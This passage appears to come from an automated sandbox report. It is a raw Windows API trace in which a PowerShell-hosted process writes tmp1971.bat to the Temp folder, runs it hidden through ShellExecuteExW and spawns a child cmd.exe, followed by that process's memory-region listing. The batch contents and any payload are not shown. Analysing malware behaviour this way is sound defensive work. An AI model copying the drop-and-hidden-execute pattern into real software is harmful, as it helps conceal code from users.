lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.400] CoTaskMemFree (pv=0x1b852ee0) [0051.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1c85ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0051.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1c85de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0051.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1c85de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0051.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1c85de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0051.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c85dde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c85dd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c85dd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c85dd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.665] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.665] CoTaskMemFree (pv=0x1b852ee0) [0051.666] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.667] CoTaskMemFree (pv=0x1b852ee0) [0051.683] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", nBufferLength=0x105, lpBuffer=0x1c85d890, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", lpFilePart=0x0) returned 0x30 [0051.683] SetErrorMode (uMode=0x1) returned 0x1 [0051.683] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp1971.bat"), fInfoLevelId=0x0, lpFileInformation=0x1c85daf0 | out: lpFileInformation=0x1c85daf0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.683] SetErrorMode (uMode=0x1) returned 0x1 [0051.684] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", nBufferLength=0x105, lpBuffer=0x1c85d890, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", lpFilePart=0x0) returned 0x30 [0051.684] SetErrorMode (uMode=0x1) returned 0x1 [0051.684] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp1971.bat"), fInfoLevelId=0x0, lpFileInformation=0x1c85daf0 | out: lpFileInformation=0x1c85daf0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.684] SetErrorMode (uMode=0x1) returned 0x1 [0051.685] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.685] CoTaskMemFree (pv=0x1b852ee0) [0051.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c85d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c85d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c85d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.739] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.739] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.739] CoTaskMemFree (pv=0x1b852ee0) [0051.742] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", nBufferLength=0x105, lpBuffer=0x1c85dd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", lpFilePart=0x0) returned 0x30 [0051.742] SetErrorMode (uMode=0x1) returned 0x1 [0051.743] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp1971.bat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348 [0051.743] GetFileType (hFile=0x348) returned 0x1 [0051.743] SetErrorMode (uMode=0x1) returned 0x1 [0051.743] GetFileType (hFile=0x348) returned 0x1 [0051.751] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0051.752] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1c85e380 | out: lpConsoleScreenBufferInfo=0x1c85e380) returned 1 [0051.770] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.770] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.770] CoTaskMemFree (pv=0x1b852ee0) [0051.774] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.774] CoTaskMemFree (pv=0x1b852ee0) [0051.785] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.785] CoTaskMemFree (pv=0x1b852ee0) [0051.798] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.799] CoTaskMemFree (pv=0x1b852ee0) [0051.800] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.800] CoTaskMemFree (pv=0x1b852ee0) [0051.814] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.815] CoTaskMemFree (pv=0x1b852ee0) [0051.934] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.935] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.935] CoTaskMemFree (pv=0x1b852ee0) [0051.970] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0051.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.970] CoTaskMemFree (pv=0x1b852ee0) [0052.014] WriteFile (in: hFile=0x348, lpBuffer=0x3678450*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x1c85e4d8, lpOverlapped=0x0 | out: lpBuffer=0x3678450*, lpNumberOfBytesWritten=0x1c85e4d8*=0x1a0, lpOverlapped=0x0) returned 1 [0052.017] CloseHandle (hObject=0x348) returned 1 [0052.032] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0052.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.032] CoTaskMemFree (pv=0x1b852ee0) [0052.052] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0052.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.052] CoTaskMemFree (pv=0x1b852ee0) [0052.199] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", nBufferLength=0x105, lpBuffer=0x1c85d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", lpFilePart=0x0) returned 0x30 [0052.199] SetErrorMode (uMode=0x1) returned 0x1 [0052.199] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp1971.bat"), fInfoLevelId=0x0, lpFileInformation=0x1c85db20 | out: lpFileInformation=0x1c85db20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc3c8f080, ftCreationTime.dwHighDateTime=0x1d48db2, ftLastAccessTime.dwLowDateTime=0xc3c8f080, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xc3f167e0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x1a0)) returned 1 [0052.199] SetErrorMode (uMode=0x1) returned 0x1 [0052.200] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", nBufferLength=0x105, lpBuffer=0x1c85deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", lpFilePart=0x0) returned 0x30 [0052.200] SetErrorMode (uMode=0x1) returned 0x1 [0052.200] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp1971.bat"), fInfoLevelId=0x0, lpFileInformation=0x1c85e0c0 | out: lpFileInformation=0x1c85e0c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc3c8f080, ftCreationTime.dwHighDateTime=0x1d48db2, ftLastAccessTime.dwLowDateTime=0xc3c8f080, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xc3f167e0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x1a0)) returned 1 [0052.200] SetErrorMode (uMode=0x1) returned 0x1 [0052.200] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", nBufferLength=0x105, lpBuffer=0x1c85de30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", lpFilePart=0x0) returned 0x30 [0052.200] SetErrorMode (uMode=0x1) returned 0x1 [0052.200] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp1971.bat"), fInfoLevelId=0x0, lpFileInformation=0x1c85e040 | out: lpFileInformation=0x1c85e040*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc3c8f080, ftCreationTime.dwHighDateTime=0x1d48db2, ftLastAccessTime.dwLowDateTime=0xc3c8f080, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xc3f167e0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x1a0)) returned 1 [0052.200] SetErrorMode (uMode=0x1) returned 0x1 [0052.201] CoTaskMemAlloc (cb=0x104) returned 0x1b852ee0 [0052.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852ee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.201] CoTaskMemFree (pv=0x1b852ee0) [0052.203] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x1c85da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0052.203] SetErrorMode (uMode=0x1) returned 0x1 [0052.203] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1c85dc90 | out: lpFileInformation=0x1c85dc90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0052.203] SetErrorMode (uMode=0x1) returned 0x1 [0052.203] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x1c85da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0052.203] SetErrorMode (uMode=0x1) returned 0x1 [0052.203] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1c85dc90 | out: lpFileInformation=0x1c85dc90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0052.203] SetErrorMode (uMode=0x1) returned 0x1 [0052.210] LocalAlloc (uFlags=0x0, uBytes=0x62) returned 0x1b85a470 [0052.210] RtlMoveMemory (in: Destination=0x1b85a470, Source=0x2f2a1d0, Length=0x62 | out: Destination=0x1b85a470) [0052.211] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1b8907e0 [0052.211] RtlMoveMemory (in: Destination=0x1b8907e0, Source=0x2f33c80, Length=0x34 | out: Destination=0x1b8907e0) [0052.455] LocalFree (hMem=0x1b85a470) returned 0x0 [0052.455] LocalFree (hMem=0x1b8907e0) returned 0x0 [0052.456] NtQueryInformationProcess (in: ProcessHandle=0x458, ProcessInformationClass=0x0, ProcessInformation=0x2f34540, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x2f34540, ReturnLength=0x0) returned 0x0 [0052.457] EnumProcesses (in: lpidProcess=0x2f34588, cb=0x400, lpcbNeeded=0x1c85e4f0 | out: lpidProcess=0x2f34588, lpcbNeeded=0x1c85e4f0) returned 1 [0052.461] SetEvent (hEvent=0x390) returned 1 [0052.461] SetEvent (hEvent=0x384) returned 1 [0052.461] SetEvent (hEvent=0x388) returned 1 [0052.461] SetEvent (hEvent=0x38c) returned 1 [0052.461] SetEvent (hEvent=0x39c) returned 1 [0052.461] SetEvent (hEvent=0x3ac) returned 1 [0052.461] SetEvent (hEvent=0x378) returned 1 [0052.461] SetEvent (hEvent=0x398) returned 1 [0052.461] SetEvent (hEvent=0x30c) returned 1 [0052.465] CoUninitialize () Thread: id = 33 os_tid = 0xa58 [0052.213] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0052.219] ShellExecuteExW (in: pExecInfo=0x2f34298*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", lpParameters=0x0, lpDirectory="C:\\Users\\aETAdzjz\\Desktop", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2f34298*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", lpParameters=0x0, lpDirectory="C:\\Users\\aETAdzjz\\Desktop", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x458)) returned 1 [0052.422] CoGetContextToken (in: pToken=0x1becf550 | out: pToken=0x1becf550) returned 0x0 [0052.441] CoUninitialize () Thread: id = 35 os_tid = 0xa70 [0052.505] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0052.507] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409 [0052.507] VirtualQuery (in: lpAddress=0x1d22d700, lpBuffer=0x1d22e5c0, dwLength=0x30 | out: lpBuffer=0x1d22e5c0*(BaseAddress=0x1d22d000, AllocationBase=0x1c8a0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0052.508] VirtualQuery (in: lpAddress=0x1d22d9b0, lpBuffer=0x1d22e870, dwLength=0x30 | out: lpBuffer=0x1d22e870*(BaseAddress=0x1d22d000, AllocationBase=0x1c8a0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0052.514] SetEvent (hEvent=0x3ec) returned 1 [0052.514] SetEvent (hEvent=0x3e4) returned 1 [0052.515] SetEvent (hEvent=0x3fc) returned 1 [0052.515] SetEvent (hEvent=0x3ec) returned 1 [0052.515] SetEvent (hEvent=0x3e4) returned 1 [0052.515] SetEvent (hEvent=0x460) returned 1 [0052.515] SetEvent (hEvent=0x44c) returned 1 [0052.515] SetEvent (hEvent=0x414) returned 1 [0052.515] SetEvent (hEvent=0x45c) returned 1 [0052.515] SetEvent (hEvent=0x464) returned 1 [0052.515] CoUninitialize () Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x36144000" os_pid = "0xa60" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9ac" cmd_line = "cmd /c \"\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat\" \"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 806 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 807 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 808 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 809 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 810 start_va = 0x49e60000 end_va = 0x49eb8fff entry_point = 0x49e60000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 811 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 812 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 813 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 814 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 815 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 816 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 817 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 818 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 819 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 820 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 821 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 822 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 823 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 824 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 825 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 826 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 827 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 828 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 829 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 830 start_va = 0x610000 end_va = 0x797fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 831 start_va = 0x7a0000 end_va = 0x920fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 832 start_va = 0x930000 end_va = 0x1d2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 833 start_va = 0x1d30000 end_va = 0x2072fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d30000" filename = "" Region: id = 834 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 835 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 836 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 837 start_va = 0x7fef9100000 end_va = 0x7fef9107fff entry_point = 0x7fef9100000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 838 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 839 start_va = 0x7fefed60000 end_va = 